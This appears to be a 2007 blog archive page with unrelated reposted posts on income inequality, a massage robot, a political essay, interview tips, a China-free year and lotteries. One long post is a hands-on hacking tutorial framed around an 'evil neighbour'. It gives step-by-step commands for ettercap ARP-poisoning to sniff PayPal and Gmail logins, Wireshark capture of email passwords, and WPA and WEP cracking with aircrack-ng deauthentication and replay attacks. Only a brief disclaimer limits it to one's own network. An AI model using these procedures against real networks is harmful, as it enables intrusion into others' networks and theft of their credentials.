Need hosting? DreamHost is the best! Use coupon code M9FREE to get a free domain name for life.

Saturday, October 13, 2007

Income inequality worst since 1920s, according to IRS data


Half of US senators are millionaires

The superrich are gobbling up an ever larger piece of the economic pie, and the poor are seeing their share of earnings shrink: new IRS data shows the top 1 percent of Americans are claiming a larger share of national income than at any time since before the Great Depression.

The top percentile of wealthy Americans earned 21.2 percent of all income in 2005, up from 19 percent in 2004, according to new Internal Revenue Service data published in the Wall Street Journal Friday.

Americans in the bottom 50 percent of wage earners saw their share of income shrink to 12.8 percent in 2005, down from 13.4 percent.

"Scholars attribute rising inequality to several factors," the Journal reports, "including technological change that favors those with more skills, and globalization and advances in communications that enlarge the rewards available to 'superstar' performers whether in business, sports or entertainment."

The data could cause problems to President Bush and Republican presidential candidates, who have played up low unemployment and a strong economy since 2003, crediting Bush's tax cuts for contributing to both. In an interview with the Journal, Bush downplayed the significance of the income gap, saying more education is the answer to narrowing it.

"First of all, our society has had income inequality for a long time. Secondly, skills gaps yield income gaps," Bush told the Journal. "And what needs to be done about the inequality of income is to make sure people have got good education, starting with young kids. That's why No Child Left Behind is such an important component of making sure that America is competitive in the 21st century."

The Journal notes that many Americans fear the economy is entering a recession, and the IRS data show income for the median earner fell 2 percent between 2000 and 2005 to $30,881. Earnings for the top 1 percent grew to $364,657 -- a 3 percent uptick.

Scholarly research suggests that top earners did not have such a large share of total income since the 1920s, the Journal reported.

The Journal reports that a recent stock boom likely contributed to higher earnings among those in the top income bracket, with hedge fund managers and Wall Street attorneys seeing their incomes skyrocket in recent years.

Another prominent pool or wealthy Americans gathers regularly on Capitol Hill to write the nation's laws. The Center for Responsive Politics, which tracks campaign spending and politicians' wealth, says more than a third of Congress members are millionaires, with at least half the Senate falling into the millionaires club.

Forbes reported that last year's incoming class of new Senators did "little to shake the Senate's image as a millionaires club," with half of the newly elected members having seven- eight- or nine-figure personal fortunes.

Freshman Sen. Bob Corker (R-TN) is worth between $64 million and $236 million, and newly elected Sen. Claire McCaskill's (D-MO) fortune is between $13 million and $29 million. R

Roll Call estimates Sen. John Kerry (D-MA) is the chamber's richest member with an estimated net worth of $750 million; another Democrat, Wisconsin Sen. Herb Kohl, is among the chamber's richest with between $220 million and $234 million in personal assets.

Thursday, October 11, 2007

Robot masseuse rubs out yet another human job category


Yet another job for humans has been co-opted by our soon-to-be robot masters — massages. Tokyo's Waseda University Takanishi Laboratory and Asahi University have developed the WAO-1 robot (Waseda Asahi Oral Rehabilitation Robot 1) for humans in need of facial massages or therapy. One of the robot's creators, Ken Nishimura, even said he hopes to see the robot take over the work in many beauty salons some day soon. Clinical trials needed to deploy the robot throughout Japan's hospitals are set to begin next month.

Tuesday, October 09, 2007

America Went Shopping While our Constitution Slowly Burned…

What will be said about Americans in the future when history looks back at our time? What will I tell my grandchildren and my great grandchildren when they ask what happened to America? It is not just this President and his administration that will be judged by them and by time. It will also be the American people.

Nero fiddled while Rome burned. Sound familiar? Okay, so Nero probably didn’t really play a fiddle while Rome was burning, but it is a great analogy for the behavior of the American public at large right now.

Right after the horrific tragedy of 9/11, Americans were glued to their television sets. We couldn’t believe we had been attacked on our own soil and we were outraged. We mourned and we cried. We learned that it was terrorists who attacked us, specifically, al Qaeda. Shortly thereafter, the President declared war on al Qaeda.

Good American citizens across the country wanted to know what they could do to help. Go shopping, the President told us. Travel, and do the things you have always done. Don’t change your lives. Don’t let the terrorists win.

So, we went shopping in droves. We bought up gas guzzling SUV’s and RV’s, went to Wal-Mart en masse to buy up cheap goods from China, and we traveled the country. We continued to take our kids to soccer and baseball practice, went to movies and football games and did what we in America do best. We spent money. We bought homes and got mortgages we couldn’t really afford and the housing industry went through the roof.

We shopped until we dropped. We did this for years. We ran up our credit card debt and spent every penny we had to pay our bills. Savings went down and spending went up. But, we were being good little patriotic citizens to win our war on terror. We couldn’t let the terrorists change our lives. And we didn’t.

The average American citizen did not go to war and did not see it. There was no draft. Our military men and women, America’s sons and daughters, were called upon time and time again to go to Iraq for longer and longer periods of time. And the government would not give them equal time at home with their families. Veteran’s benefits were cut and those who returned home with PTSD and other disabilities were not helped and cared for as they should have been. Our military was broken.

We were to mind-numbed and shopping happy to see that our Constitution was being disassembled piece by piece. The enemy of freedom and democracy was not a foreign terrorist – although they do exist and are a threat. The enemy was our own government.

Behind the scenes, in the name of the Great War on Terror, people were being quietly picked up around the world and flown to secret bases and tortured for information – policies that are strictly forbidden in the Geneva Convention. This is called Rendition. We put hundreds of men and young boys into Guantanimo Bay and held them without charge for years on end, away from their country and their family and all they hold dear.

American citizens were spied on, had their phone calls listened to and emails read without the benefit of warrants and the FISA court.

In the name of the Great War on Terror and all Americans, prisoners at Abu Ghraib were tortured in the most hideous of ways and further humiliated by having their pictures taken by their torturers.

The mainstream media was bought by the government and did not report the facts, the truth. We did not question their reporting when, after we attacked and moved into Afghanistan, the build up for war in Iraq began. The leaders of this country used fear and terror to sell this war, with threats of mushroom clouds, biochemical attacks and the great evil one, Saddam Hussein. Never mind that the UN Weapons Inspectors told the leaders of this country and the world that Iraq had no weapons of mass destruction and hadn’t had them for years. We were flat out lied to by President and his administration.

A private mercenary Army was created by Blackwater that moved into Iraq and did the jobs our soldiers used to do with more money – from a no-bid contrast. Halliburton and KBR also won no-bid contracts in Iraq and in the United States. New Orleans was destroyed when the levees failed, and the poor neighborhoods were not rebuilt. FEMA trailers meant to help those who were left homeless were left standing empty in fields full of useless metal that is rusted and useless.

Huge detention centers were quietly built (by Halliburton and paid for with no-bid contracts) beyond the sight of the public eye meant to hold hundreds of thousands of people “in the event of a national emergency”. Many dissenters fear they were built to hold us.

The leaders of this government have tried to quell of freedom of speech, dissent and democracy in general. The right of Habeas Corpus was taken away by the President, who declared himself the Decider. He gave himself the power to decide who was an enemy combatant and who was not. He declared that anyone who opposed the war could be called an enemy combatant.

Our jobs were sent overseas to China and India. Immigrants from Mexico poured over our borders freely.

Our national debt leaped in just a few years to several trillion, yes TRILLION dollars, much of it borrowed from China.

Children’s healthcare was denied but money was approved to continue a war that most Americans eventually came to disagree with. Citizens marched in the hundreds of thousands on Washington to demonstrate the public outcry against the war, but the media did not report it. We lobbied Congress day after day after day for years, yet they paid little more than lip service to us.

The Republicans ignored us. The Democrats told us, get us elected and we will help you. We got them elected and they turned their backs on the American People.

Our President wanted to be a War President. He believed the Constitution was nothing more than “a goddamn piece of paper” and the Vice President ran a shadow government. They believed themselves, and apparently rightly so, above the law. The President claimed that God talked to him personally.

Good Christian people went to church and listened to their preachers tell them to support the President. Some were told that it was a sin if they voted for anyone other than the President when it came time for re-election, so the college frat boy who failed at just about everything he touched in his life once again was elected President – some believe via a stolen election for the second time.

All of this while we Americans consumed goods in mass quantities and woke in the morning with the hang over of debt and worry. Our jobs were going and we started losing our homes.

And then they told us about Global Warming, Darfur and mass refugee camps. We began to hear the same rhetoric that was spewed about Iraq used to build the case for war with Iran. This, when our military was broken.

But we shopped. We did our duty to our country to keep our economy going and strong. The rich grew richer, the poor grew poorer, the middle class began to disappear, and We the People, will be paying for our blindness and stupidity for generations to come.

I ask you, who is the real enemy of Freedom and Democracy? Is it not the responsibility of every American citizen to see to it that our elected Representatives and Officials keep their oath of office to uphold and protect the Constitution of our country? This is their sacred duty.

Amy Branham

Saturday, October 06, 2007

How to answer 23 of the most common interview questions

Let’s face it; no one likes the interview process. Well, certainly not the people being interviewed anyway. You have to be on your best behavior, you only get one chance to get it right, and it’s like taking your driving test all over again. Over the years I’ve been to countless interviews. To get my first job out of college I attended some 15-20 interviews a week. Whether it was in Britain or over here in the States, the questions never really seemed to change from job to job. Not only that, but the answers to them are usually the same, with your own personal interpretation of course. Here I present 23 questions you’re likely to be asked, and how I have learned to answer them. Why 23? Because I had more than 20 and less than 25. Remember, being interviewed is a skill, and if you do the preparation you should ace it every time.

1. So, tell me a little about yourself.
I’d be very surprised if you haven’t been asked this one at every interview. It’s probably the most asked question because it sets the stage for the interview and it gets you talking. Be careful not to give the interviewer your life story here. You don’t need to explain everything from birth to present day. Relevant facts about education, your career and your current life situation are fine.

2. Why are you looking (or why did you leave you last job)?
This should be a straightforward question to answer, but it can trip you up. Presumably you are looking for a new job (or any job) because you want to advance your career and get a position that allows you to grow as a person and an employee. It’s not a good idea to mention money here, it can make you sound mercenary. And if you are in the unfortunate situation of having been downsized, stay positive and be as brief as possible about it. If you were fired, you’ll need a good explanation. But once again, stay positive.

3. Tell me what you know about this company.
Do your homework before you go to any interview. Whether it’s being the VP of marketing or the mailroom clerk, you should know about the company or business you’re going to work for. Has this company been in the news lately? Who are the people in the company you should know about? Do the background work, it will make you stand out as someone who comes prepared, and is genuinely interested in the company and the job.

4. Why do you want to work at X Company?
This should be directly related to the last question. Any research you’ve done on the company should have led you to the conclusion that you’d want to work there. After all, you’re at the interview, right? Put some thought into this answer before you have your interview, mention your career goals and highlight forward-thinking goals and career plans.

5. What relevant experience do you have?
Hopefully if you’re applying for this position you have bags of related experience, and if that’s the case you should mention it all. But if you’re switching careers or trying something a little different, your experience may initially not look like it’s matching up. That’s when you need a little honest creativity to match the experiences required with the ones you have. People skills are people skills after all, you just need to show how customer service skills can apply to internal management positions, and so on.

6. If your previous co-workers were here, what would they say about you?
Ok, this is not the time for full disclosure. If some people from your past are going to say you’re a boring A-hole, you don’t need to bring that up. Stay positive, always, and maybe have a few specific quotes in mind. “They’d say I was a hard worker” or even better “John Doe has always said I was the most reliable, creative problem-solver he’d ever met.”

7. Have you done anything to further your experience?
This could include anything from night classes to hobbies and sports. If it’s related, it’s worth mentioning. Obviously anything to do with further education is great, but maybe you’re spending time on a home improvement project to work on skills such as self-sufficiency, time management and motivation.

8. Where else have you applied?
This is a good way to hint that you’re in demand, without sounding like you’re whoring yourself all over town. So, be honest and mention a few other companies but don’t go into detail. The fact that you’re seriously looking and keeping your options open is what the interviewer is driving at.

9. How are you when you’re working under pressure?
Once again, there are a few ways to answer this but they should all be positive. You may work well under pressure, you may thrive under pressure, and you may actually PREFER working under pressure. If you say you crumble like aged blue cheese, this is not going to help you get your foot in the door.

10. What motivates you to do a good job?
The answer to this one is not money, even if it is. You should be motivated by life’s noble pursuits. You want recognition for a job well done. You want to become better at your job. You want to help others or be a leader in your field.

11. What’s your greatest strength?
This is your chance to shine. You’re being asked to explain why you are a great employee, so don’t hold back and stay do stay positive. You could be someone who thrives under pressure, a great motivator, an amazing problem solver or someone with extraordinary attention to detail. If your greatest strength, however, is to drink anyone under the table or get a top score on Mario Kart, keep it to yourself. The interviewer is looking for work-related strengths.

12. What’s your biggest weakness?
If you’re completely honest, you may be kicking yourself in the butt. If you say you don’t have one, you’re obviously lying. This is a horrible question and one that politicians have become masters at answering. They say things like “I’m perhaps too committed to my work and don’t spend enough time with my family.” Oh, there’s a fireable offense. I’ve even heard “I think I’m too good at my job, it can often make people jealous.” Please, let’s keep our feet on the ground. If you’re asked this question, give a small, work-related flaw that you’re working hard to improve. Example: “I’ve been told I occasionally focus on details and miss the bigger picture, so I’ve been spending time laying out the complete project every day to see my overall progress.”

13. Let’s talk about salary. What are you looking for?
Run for cover! This is one tricky game to play in an interview. Even if you know the salary range for the job, if you answer first you’re already showing all your cards. You want as much as possible, the employer wants you for as little as you’re willing to take. Before you apply, take a look at salary.com for a good idea of what someone with your specific experience should be paid. You may want to say, “well, that’s something I’ve thought long and hard about and I think someone with my experience should get between X & Y.” Or, you could be sly and say, “right now, I’m more interested in talking more about what the position can offer my career.” That could at least buy you a little time to scope out the situation. But if you do have a specific figure in mind and you are confident that you can get it, I’d say go for it. I have on many occasions, and every time I got very close to that figure (both below and sometimes above).

14. Are you good at working in a team?
Unless you have the I.Q. of a houseplant, you’ll always answer YES to this one. It’s the only answer. How can anyone function inside an organization if they are a loner? You may want to mention what part you like to play in a team though; it’s a great chance to explain that you’re a natural leader.

15. Tell me a suggestion you have made that was implemented.
It’s important here to focus on the word “implemented.” There’s nothing wrong with having a thousand great ideas, but if the only place they live is on your notepad what’s the point? Better still, you need a good ending. If your previous company took your advice and ended up going bankrupt, that’s not such a great example either. Be prepared with a story about an idea of yours that was taken from idea to implementation, and considered successful.

16. Has anything ever irritated you about people you've worked with?
Of course, you have a list as long as your arm. But you can’t say that, it shows you as being negative and difficult to work with. The best way to answer this one is to think for a while and then say something like “I’ve always got on just fine with my co-workers actually.”

17. Is there anyone you just could not work with?
No. Well, unless you’re talking about murderers, racists, rapists, thieves or other dastardly characters, you can work with anyone. Otherwise you could be flagged as someone who’s picky and difficult if you say, “I can’t work with anyone who’s a Bronco’s fan. Sorry.”

18. Tell me about any issues you’ve had with a previous boss.
Arrgh! If you fall for this one you shouldn’t be hired anyway. The interviewer is testing you to see if you’ll speak badly about your previous supervisor. Simply answer this question with exteme tact, diplomacy and if necessary, a big fat loss of memory. In short, you've never had any issues.

19. Would you rather work for money or job satisfaction?
It’s not a very fair question is it? We’d all love to get paid a Trump-like salary doing a job we love but that’s rare indeed. It’s fine to say money is important, but remember that NOTHING is more important to you than the job. Otherwise, you’re just someone looking for a bigger paycheck.

20. Would you rather be liked or feared?
I have been asked this a lot, in various incarnations. The first time I just drew a blank and said, “I don’t know.” That went over badly, but it was right at the start of my career when I had little to no experience. Since then I’ve realized that my genuine answer is “Neither, I’d rather be respected.” You don’t want to be feared because fear is no way to motivate a team. You may got the job done but at what cost? Similarly, if you’re everyone’s best friend you’ll find it difficult to make tough decisions or hit deadlines. But when you’re respected, you don’t have to be a complete bastard or a lame duck to get the job done.

21. Are you willing to put the interests of X Company ahead of your own?
Again, another nasty question. If you say yes, you’re a corporate whore who doesn’t care about family. If you say no, you’re disloyal to the company. I’m afraid that you’ll probably have to say yes to this one though, because you’re trying to be the perfect employee at this point, and perfect employees don’t cut out early for Jimmy’s baseball game.

22. So, explain why I should hire you.
As I’m sure you know, “because I’m great” or “I really need a job” are not good answers here. This is a time to give the employer a laundry list of your greatest talents that just so happen to match the job description. It’s also good to avoid taking potshots at other potential candidates here. Focus on yourself and your talents, not other people’s flaws.

23. Finally, do you have any questions to ask me?
I’ll finish the way I started, with one of the most common questions asked in interviews. This directly relates to the research you’ve done on the company and also gives you a chance to show how eager and prepared you are. You’ll probably want to ask about benefits if they haven’t been covered already. A good generic one is “how soon could I start, if I were offered the job of course.” You may also ask what you’d be working on. Specifically, in the role you’re applying for and how that affects the rest of the company. Always have questions ready, greeting this one with a blank stare is a rotten way to finish your interview. Good luck and happy job hunting.

Friday, July 06, 2007

How to crack SSL over a wireless network

Introduction

Do you think you’re safe if you type https :// before paypal.com? I hope you’ll think twice before you login from a computer connected to a wireless network after reading this guide. Let’s start at the beginning. Let’s say you have an evil neighbour who wants your paypal credentials. He buys himself a nice laptop with a wireless card and, if you are using a wep encryption, he cracks your wep code (click here to see how). After cracking the key he logs into your network. Maybe you always allowed him to use your network because you thought it can’t do any harm to your computer. You aren’t sharing any folders so what’s the problem? Well, in the next few steps I’m going to describe the problem.

The guide

1. Let’s assume your neighbour uses linux to crack your wep key. After cracking it, he installs ettercap (http://ettercap.sourceforge.net/) on his linux system. If you want to do this at home, I would recommend you to download BackTrack because it already has everything installed. Look at the WEP cracking guide I mentioned above for more info about BackTrack. If you want to install it on your own linux distribution, download the source and install it with the following commands:

$ tar -xzvf ettercap-version.tar.gz
$ make
$ make install

2. After installing, you need to uncomment some code to enable SSL dissection. Open up a terminal window and type "nano /usr/local/etc/etter.conf", without the quotes. Scroll down using your arrow keys until you find this piece of code:

# if you use iptables:
# redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport"
# redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport"

You need to uncomment the last two lines.

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport"

3. Press CTRL+O, press enter to safe the file and then press CTRL+X.

4. Boot Ettercap and click on Sniff > Unified Sniffing > type in your wireless interface and press ok.

5. Press CTRL+S to scan for hosts

6. Go to MITM > ARP poisoning, select sniff remote connections and press ok.

7. Now you (and your neighbour!) can start sniffing! Press start > start sniffing. Walk to another computer on your network and open up paypal or any other site where you need to type in an username/password (gmail, hotmail, digg.com, etc.). All credentials will appear on the computer running Ettercap!

8. When you’re done, don’t just close Ettercap, but go to Start > Stop Sniffing, and then go to MITM > Stop mitm attack(s).

But how does all this stuff work?

Look at the following scheme:

Normally when you type in a password, host 1 (your computer) directly connects to host 2 (your modem or router). But if someone launced Ettercap on your network, host 1 isn’t sending it’s passwords to host 2, but to the Attacking host, the host that’s running Ettercap! The attacking host sends everything to Host 2. This means that host 1 isn’t noticing anything! Exactly the same happens with everything that host 2 is sending. Host 2 doesn’t send packets directly to host 1, but first to the attacking host.

How to get someone's email username/password

Did you know that everyone using your network (wireless and/or wired) can get the password of you e-mail account? Even if you have protected your network with a wep code your password lies on the street. In this tutorial I’m not going to descibe how to crack wep (sorry folks, maybe next week), but I’m going to describe how to “steal” your own password using a computer in your network.

1. The first step is downloading Wireshark, the succesor of Ethereal from http://wireshark.org/download.html

2. Install Wireshark, also install WinPcap (the installer will ask you i you want to install this, choose yes).

3. Start Wireshark. In the menu at the top select Capture > Options.

4. The Capture Options menu will pop up. In the interface field, choose the network interface you want to use.

5. Choose ‘Capture packets in promiscuous mode’ if you want to capture packets (eg. find a password) generated by another computer on the network than yours.

6. Clear everything in the ‘Capture Filter’ field. We don’t need to use filters at the moment.

7. Don’t touch the rest of the settings. If you want to know the function of a setting, keep your mouse on it for a little while.

8. Click start to start capturing. On the computer where you want to ’steal’ the pass from (to make thing easier the first time, just use the computer that’s running Wireshark, the computer you are working on atm), launch a mail application (Outlook, Thunderbird etc.) and retreive your new mail.

9. Go back to Wireshark and stop the capturing by clicking stop. The captured files will appear. Click ‘protocol’ to sort the packets on their protocol.

10. Search for the protocol ‘pop’ to find your e-mail password. Look below for an example of the packets:

wireshark

11. That’s all! You now have your e-mail account’s username and password! Now trow away your wireless network or everyone can get your password while walking on your street!

Cracking WPA

1. Get yourself a good Linux distribution and download the newest aircrack-ng suite (www.aircrack-ng.org). Also download Kismet.

I would warmly recommend you to use back|track because it already has everything installed. Check the cracking WEP tutorial for information about the back|track installation.

2. Put your wireless card in monitor mode.

There are many different ways to do this. Some may not work with your drivers/card. I will explain one here: Type ‘iwconfig’ in a terminal to see your wireless interfaces (mine is ath0). After that, type ‘iwconfig [interface] mode Monitor’ to put your interface in monitor mode.

3. Start Kismet and wait a few seconds to find all networks in your area. First press ’s’ and then ’f’ to sort the networks and navigate to a WPA enabled network with your arrow keys. Press enter to get more information about the highlighted network. Do this in order to make sure that the network is protected with a WPA encryption. Also remember on which channel the network is running.

4. Now start airodump, by opening a terminal window (you can use the one from the previous step) and typing:

airodump-ng -c [channel] -w wpa [interface]

5. Airodump will find all networks in the area using the channel you entered. Wait for ‘your’ network to show up and wait for a client connecting to that access point. Clients are shown in the list below the list of AP’s.

6. Open a new terminal window and type:

aireplay-ng [interface] –deauth 25 -a [MAC address of the AP*] -h [MAC of the client]

* The MAC address: The number that airodump calls ‘BSSID’. It usually looks like this: 12:34:45:78:89:56

7. The deauth attack will kick the client off the network and force him to reconnect. During this reconnect airodump captures the so called ‘handshake’. To crack the key, start a new terminal window. Keep airodump running. In the new terminal, type:

aircrack-ng -w [full path to dictionary file**] wpa-01.cap

** Search the web for a good dictionary file (try Google with the term “security wordlist”, please post good dictionaries in the comments). If you are using back|track, open a new terminal window and type (HD install only!):

cd /pentest/password/dictionaries
gunzip wordlist.txt.Z

After unzipping, the “full path to dictionary file” is /pentest/password/dictionaries/wordlist.txt.

8. Now wait a long time. This can take hours if you aren’t lucky and if the keyphrase isn’t in the dictionary you’ll never find the key. If the key is found it shows up in aircrack. I’m currently figuring out how rainbow Tables work. From what I read these Rainbow Tables can crack a WPA key in 10 minutes (wow!). Expect a tutorial about how this works within a few days.

Cracking WEP: The Ultimate Guide

##### Preparation #####

1. Download BackTrack (http://www.remote-exploit.org/index.php/BackTrack_Downloads)

2. Install BackTrack to your hd or just boot the live cd (username: root, password: toor; Don’t froget to start the gui: type in startx on the command lien after logging in).

3. Start up a terminal and set your wireless interface in monitor mode.

iwconfig [wireless interface] mode monitor

* to find out what your wireless interface is, type iwconfig and press enter. All interfaces will show up (mine is ath0).

4. Start airodump by typing in the terminal (press enter after typing it in)

airodump-ng –ivs -w capture [wireless interface]

5. When airodump found the network you want to hack it’ll show up. Note the BSSID (acces point’s mac address) and the SSID (the access point’s name). Don’t close this terminal window or stop airodump from running before you have the wep key!

##### Generating data, method one: There are clients visible in airodump associated to the network #####

1. Open a new terminal window and type in (press enter after typing in):

aireplay-ng [wireless interface] –arpreplay -e [the SSID you found with airodump] -b [the BSSID you found wth airodump] -h [the client’s MAC adress]

2. Open another new terminal window and type in (press enter after typing in):

aireplay-ng [wireless interface] –deauth 10 -a [the client’s MAC adress]

3. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.

##### Generating data, method two: There are NO clients visible in airodump associated to the network #####

1. Open a new terminal window and type in (do NOT press the enter button!)

aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06

2. Open another new terminal window and type in (do NOT press the enter button!):

aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID you found wth airodump] -h 01:02:03:04:05:06

3. Press enter in the fakeauth terminal and after it started to fakeauth, press enter as quickly as possible in the arpreplay window.

3. Open another new terminal window and type in (press enter after typing in):

aireplay-ng [wireless interface] –deauth 10 -a 01:02:03:04:05:06

4. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.

##### If the above two methods aren’t working, try this #####

1. Open a new terminal window and type in (press the enter button after typing it in):

aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID you found wth airodump] -h 01:02:03:04:05:06

2. Open another new terminal window and type in (press the enter button after typing it in):

aireplay-ng [wireless interface] –chopchop -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06

3. The chopchop starts reading packages. When it finds one, it’ll ask you to use it. Choose yes. Wait a few seconds/minutes and remember the filename that is given to you at the end.

4. Open Ethereal (click the icon in the bottom left corner > Backtrack > Sniffers > Ethereal) and open the xor file made with the chopchop attack in Ethereal (it’s located in the home folder)

5. Look with Ethereal in the captured file. Try to find the source ip and the destination ip: write those addresses down somewhere.

6. open a terminal and type in (press enter after typing in):

arpforge-ng [the name of the xor file from the chopchop attack] 1 [the BSSID you found wth airodump] 01:02:03:04:05:06 [the source ip] [the destination ip] arp.cap

7. In a new or in the same terinal window, type in (and press enter):

aireplay-ng -2 ath0 -r arp.cap

5. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.

##### The actual cracking of the WEP key #####

1. Open a new terminal window and type in

airecrack-ng -n 64 capture-01.ivs (for a 64 bits encryption, enter after typing)

or

airecrack-ng -n 128 capture-01.ivs (for a 128 bits encryption, enter after typing)

If you don’t know how strong the encryption is, type in both in different terminals and start a third terminal. Type in this code:

airecrack-ng capture-01.ivs

2. Wait a few minutes. Check the terminal(s). The code will automaticly show up if found. Keep airodump running!

##### Disclaimer #####

I don’t think have to mention that you need written permission from the owner of the network before you are allowed to start cracking his wep or even before you are allowed to capture packages. Just try it with your own network. You’ll learn a lot about it. But never ever try it with another network than your own.

##### Donations #####

I hope you enjoyed reading this guide. I did enjoy writing it, but I really don’t enjoy paying the bills for hosting and bandwidth. Please help me keeping this site up and make a small paypal donation to paypal@profit42.com.

Thanks.

Monday, July 02, 2007

A year without 'Made in China'

By Sara Bongiorni

BATON ROUGE, LA. – Last year, two days after Christmas, we kicked China out of the house. Not the country obviously, but bits of plastic, metal, and wood stamped with the words "Made in China." We kept what we already had, but stopped bringing any more in.

The banishment was no fault of China's. It had coated our lives with a cheerful veneer of toys, gadgets, and $10 children's shoes. Sometimes I worried about jobs sent overseas or nasty reports about human rights abuses, but price trumped virtue at our house. We couldn't resist what China was selling.

But on that dark Monday last year, a creeping unease washed over me as I sat on the sofa and surveyed the gloomy wreckage of the holiday. It wasn't until then that I noticed an irrefutable fact: China was taking over the place.

It stared back at me from the empty screen of the television. I spied it in the pile of tennis shoes by the door. It glowed in the lights on the Christmas tree and watched me in the eyes of a doll splayed on the floor. I slipped off the couch and did a quick inventory, sorting gifts into two stacks: China and non-China. The count came to China, 25, the world, 14. Christmas, I realized, had become a holiday made by the Chinese. Suddenly I'd had enough. I wanted China out.

Through tricks and persuasion I got my husband on board, and on Jan. 1 we launched a yearlong household embargo on Chinese imports. The idea wasn't to punish China, which would never feel the pinprick of our protest. And we didn't fool ourselves into thinking we'd bring back a single job to unplugged company towns in Ohio and Georgia. We pushed China out of our lives because we wanted to measure how far it had pushed in. We wanted to know what it would take in time, money, and aggravation to kick our China habit.

We hit the first rut in the road when I discovered our son's toes pressing against the ends of his tennis shoes. I wore myself out hunting for new ones. After two weeks I broke down and spent $60 on sneakers from Italy. I felt sick over the money; it seemed decadent for a pair of children's shoes. I got used to the feeling. Weeks later I shelled out $60 for Texas-made shoes for our toddler daughter.

We got hung up on lots of little things. I drove to half a dozen grocery stores in search of candles for my husband's birthday cake, eventually settling on a box of dusty leftovers I found in the kitchen. The junk drawer has been stuck shut since January. My husband found the part to fix it at Home Depot but left it on the shelf when he spotted the telltale "Made in China."

Mini crises erupted when our blender and television broke down. The television sputtered back to life without intervention, but it was a long, hot summer without smoothies. We killed four mice with old-fashioned snapping traps because the catch-and-release ones we prefer are made in China. Last summer at the beach my husband wore a pair of mismatched flip-flops my mother found in her garage. He'd run out of options at the drug store.

Navigating the toy aisle has been a wilting affair. In the spring, our 4-year-old son launched a countercampaign in support of "China things." He's been a good sport, but he's weary of Danish-made Legos, the only sure bet for birthday gifts for his friends. One morning in October he fell apart during a trip to Target when he developed a sudden lust for an electric purple pumpkin.

"It's too long without China," he wailed. He kept at me all day.

The next morning I drove him back so he could use his birthday money to buy the pumpkin for himself. I kept my fingers off the bills as he passed them to the checker.

My husband bemoans the Christmas gifts he can't buy because they were made in China. He plans to sew sleeping bags for the children himself. He can build wooden boats and guitars, but I fear he will meet his match with thread and needle.

"How hard can it be?" he scoffed.

The funny thing about China's ascent is that we, as a nation, could shut the whole thing down in a week. Jump-start a "Just Say No to Chinese Products Week," and the empire will collapse amid the chaos of overloaded cargo ships in Long Beach harbor. I doubt we could pull it off. Americans may be famously patriotic, but look closely, and you'll see who makes the flag magnets on their car bumpers. These days China delivers every major holiday, Fourth of July included.

I don't know what we will do after Dec. 31 when our family's embargo comes to its official end. China-free living has been a hassle. I have discovered for myself that China doesn't control every aspect of our daily lives, but if you take a close look at the underside of boxes in the toy department, I promise it will give you pause.

Our son knows where he stands on the matter. In the bathtub one evening he told me how happy he was that "the China season" was coming soon.

"When we can buy China things again, let's never stop," he said.

After a year without China I can tell you this: You can still live without it, but it's getting trickier and costlier by the day. And a decade from now I may not be brave enough to try it again.

• Sara Bongiorni is a freelance writer and is working on a book about her family's yearlong adventure in the global economy.

Monday, April 09, 2007

The Lottery Scam

Would you like to pay a 75% sales tax? This is what you are paying when you purchase a lottery ticket.

Don't believe me? Read on.

First of all, lottery is a form of gambling that pits your odds against the house(lottery organizer), same as most form of casino gambling. So what exactly is your odd of winning? Usually a casino game will have odds that looks approximately like this, ((you 47% vs 53% house)), as you can see, the house always wins, but it wins by a slim margin. Of course some games like the slots have worse odds and some game such as blackjack have better odds, but mostly they do not deviate much from 47% vs 53%.

So what are the odds when you play the lottery? It's ((you 0.00000001% vs 99.99999999% house)). Yes you read that right, the house always wins and wins with a huge margin. Why? Because on any given round of lottery, the house (lottery organizer) takes at least a 50% cut right away, that means no matter if there is a winner, 50% of the money YOU paid is gone! What would you do if a casino take 50% of your bet each time you make a bet, regardless if you win or lose?

But wait, there is more, when you do win the big prize, the government (same entity as the organizer in most cases) takes another 50%+ cut on your prize money as income tax. Feeling the love?

But wait, there is more, you know the money you spent to purchase the lottery ticket? that's after tax dollars, meaning you already paid income tax on that money! Every single dollar in the prize pool are after tax dollars! So basically, millions of people are buying a lottery ticket, so they can have the privilege to have one lucky person to pay income tax on after tax money again! Although millions of dollars changed hands, nothing was produced, it's just magic and more income tax!

So what really is the odd of winning the lottery? Well it's different each time, but I could tell you this, you are approximately 1000 times more likely to die in a car accident than winning the lottery.

Here is an example with numbers:
Step 0. 300 million after tax dollars spent on lottery ticket (government= +$60 mil, due to income tax)

Step 1. 300 million lottery ticket purchased (government = +$55 mil, some money spent on administrating the lottery)

Step 2. 50% house cut taken (government = +$205 mil)

Step 3. A winner! now pay income tax (government = +$280 mil)

Step 4. The winner is left with $75 mil while the government's net profit is $280 million dollars!

Yes that's right, you effectively just paid 75% sales tax to purchase a lottery ticket, so that you can gamble in a game with odds that is the worst odds on the planet.

But that's all fine, if people are willing to do it, why should I care? I care because a government organized lottery is nothing but a regressive tax. Those who are most likely to buy a lottery ticket are usually the less affluent members of society. So a lottery is effectively a tax that only collected from the poor, thus making the poor poorer.

The following comments are from wikipedia:
